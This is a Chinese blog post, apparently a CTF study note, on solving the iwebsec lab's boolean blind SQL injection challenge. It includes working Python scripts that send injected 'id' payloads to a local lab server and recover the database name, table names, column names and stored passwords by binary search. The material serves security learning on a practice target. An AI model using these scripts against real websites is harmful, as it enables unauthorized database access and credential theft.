CTF学习笔记5:iwebsec-SQL注入漏洞-03-bool注入

已于 2022-01-22 23:24:53 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: CTF 文章标签: sql web安全 安全
于 2022-01-22 18:47:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lifeng_dc/article/details/122641310
版权

目录

一、解题过程

(一)观察payload与结果

1.SQL执行有结果,就输出welcome to iwebsec!!!

在这里插入图片描述

2.否则输出1

在这里插入图片描述

(二)编写脚本逐项获取信息

1.获取数据库名字符串长度

先要为python安装requests包

pip install requests

python代码如下:

#encoding=utf-8
import requests
import os

url="http://192.168.182.130:8001/sqli/03.php"

def DbLen():
	for i in range(1,20):
		payload="?id=1 and (length(database())={})--+".format(i)
		req_url=url+payload
		rep=requests.get(url=req_url)
		if "welcome to iwebsec!!!" in rep.text:
			print("DB length is "+str(i))
DbLen()

在这里插入图片描述

2.获取数据库名

def DbName():
	result=""
	for i in range(1,8):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=1 and ord(mid((select database()),{},1))>{} --+".format(i,mid)
			req_url=url+payload
			#print(req_url)
			rep=requests.get(url=req_url)
			if "welcome to iwebsec!!!" in rep.text:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
DbName()

在这里插入图片描述

3.获取表名

def TablesName():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=1 and ord(mid((select group_concat(table_name) 
			from information_schema.tables where table_schema=database()),{},1))>{} --+'''.format(i,mid)
			req_url=url+payload
			#print(req_url)
			rep=requests.get(url=req_url)
			if "welcome to iwebsec!!!" in rep.text:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
TablesName()

在这里插入图片描述

4.获取users表的列名

def ColumnsName():
	result=""
	for i in range(1,30):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=1 and ord(mid((select group_concat(column_name) 
				from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} --+'''.format(i,mid)			
			req_url=url+payload
			#print(req_url)
			rep=requests.get(url=req_url)
			if "welcome to iwebsec!!!" in rep.text:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
ColumnsName()

在这里插入图片描述

5.获取password字段的数据

def GetData():
	result=""
	for i in range(1,20):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=1 and ord(mid((select group_concat(password) from iwebsec.users),{},1))>{} --+".format(i,mid)			
			req_url=url+payload
			#print(req_url)
			rep=requests.get(url=req_url)
			if "welcome to iwebsec!!!" in rep.text:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
GetData()

在这里插入图片描述

二、源码分析

(一)php源码分析

在这里插入图片描述

(二)部分脚本分析

在这里插入图片描述

lvx++
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
cypherpunks-ctf:Cypherpunks CTF 智能合约漏洞攻击
05-14
Cypherpunks CTF Cypherpunks CTF是一款基于Web3 / 的战争游戏,灵感来自 ,该游戏将在以太坊虚拟机中进行播放。 每个级别都是一个需要被“破解”的智能合约。 欢迎等级PR! 在本地运行 安装所有软件包 ...
SQL注入漏洞 | bool
weixin_52116519的博客
11-28 668
SQL注入漏洞 | iwebsecSQL注入漏洞 | 数字型参考文章文章所涉及的脚本代码,可以自己动手敲一次,增进理解,形成自己的SQl注入脚本,以后可以不断复用。
sql注入bool盲注
banliyaoguai的博客
05-12 564
二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。首先选择数组中间的数字和需要查找的目标值比较如果相等最好,就可以直接返回答案了如果不相等如果中间的数字大于目标值,则中间数字向右的所有数字都大于目标值,全部排除如果中间的数字小于目标值,则中间数字向左的所有数字都小于目标值,全部排除。
CTF学习笔记6:iwebsec-SQL注入漏洞-04-sleep注入
lvx++的博客
01-22 473
目录一、解题过程(一)观察页面(二)编写脚本逐项获取数据1.获取数据库名的长度(可不做)2.获取数据库名(可不做)3.获取表名4.获取users表的列名5.获取password列的数据源码分析(一)php源码关键脚本 一、解题过程 (一)观察页面 发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入 (二)编写脚本逐项获取数据 1.获取数据库名的长度(可不做) #encoding=utf-8 import requests import os import time url="ht
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4842
以pikachu靶场练习来学习ctf知识
从0到1 CTFer成功之路》SQL注入---学习笔记
aweiname2008的博客
06-13 473
《从0到1 CTFer成功之路》学习笔记 书中已经有很详细的代码讲解,但是部分测试代码需要自己来敲,还要搭建php+mysql环境,如果这些有docker不就更好了,我自己是在虚拟机中搭建中,记录一下学习过程,希望能帮助到有需要的人。学习笔记按书的章节记录,并非全部零星记录。 第1章 web入门 1.2 CTF中的SQL注入 1.21 SQL基础 测试使用的php代码: <?php //连接本地MySQL数据库为test $conn = mysqli_connect("127.0.0.1","
ctfshow-sql注入-超详解(172-200)
qq_50589021的博客
08-05 2586
前言 今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。 新手区 可以看看Y4师傅以前记录的小笔记 SQL注入之MySQL注入学习笔记(一) SQL注入之MySQL注入学习笔记(二) 2021-7-25 web172、web173——hex() 、to_base64() 查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password fro
ctf特训营-学习笔记
qq_44555676的博客
10-29 2077
报错注入-floor报错 简单来说,floor报错的原理是rand和order by或group by的冲突 在MySQL文档中的原文如下: 经典语句: and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) floor()报错产生的条件: select count(*) ,floor(rand(0)*2)x from secur
SQL注入初步
qq_43399979的博客
09-04 171
SQL注入初步学习 (将之前写的一些笔记挪到这里来) 按照基本思路,将SQL注入划分为以下一些类型 1、union回显注入 这种类型的注入会将查询结果显示在前端 一般来说,首先要判断注入点,一般有 GET,POST,cookie 三种形式的注入点 三种常见注释:#,-- (写在URL中时空格会被消掉,所以要写–+),/**/ order by用来判断查询的列数 常用的几句查询语句: select ...
SQLI-LABS修炼笔记(二)
郁离歌丶的博客
03-04 983
写在前面:今天的重点是盲注。首先介绍一下sql注入截取字符串常用函数有三大法宝。mid(),substr(),left()1.mid()函数MID(column_name,start[,length])如: str="123456" mid(str,2,1) 结果为2Sql用例:(1)MID(DATABASE(),1,1)&gt;’a’,查看数据库名第一位,MID(DATABASE(),2,1)查...
SQLi-Labs通关笔记
Lethe's Blog
07-26 1931
Less-1 ?id=1' 单引号报错,存在注入 ?id=1' order by 4 %23'报错,存在三列 ?id=-1' union select 1,2,3%23 发现2和3的位置可以回显,于是进行注入 ?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where ta...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
java红酒网站源码-ctf-katana:ctf-武士刀
06-05
java网站源码CTF-武士刀 约翰哈蒙德 | 2018 年 2 月 1 日 在撰写本文时,此存储将仅托管可能有助于解决 CTF 挑战的工具和命令列表。 我希望将其保留为“实时文档”,理想情况下它不会像我制作的旧“工具”页面 () ...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 362
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 233
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQLynx数据库管理工具
最新发布
core815的专栏
07-24 322
SQLynx数据库管理工具
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值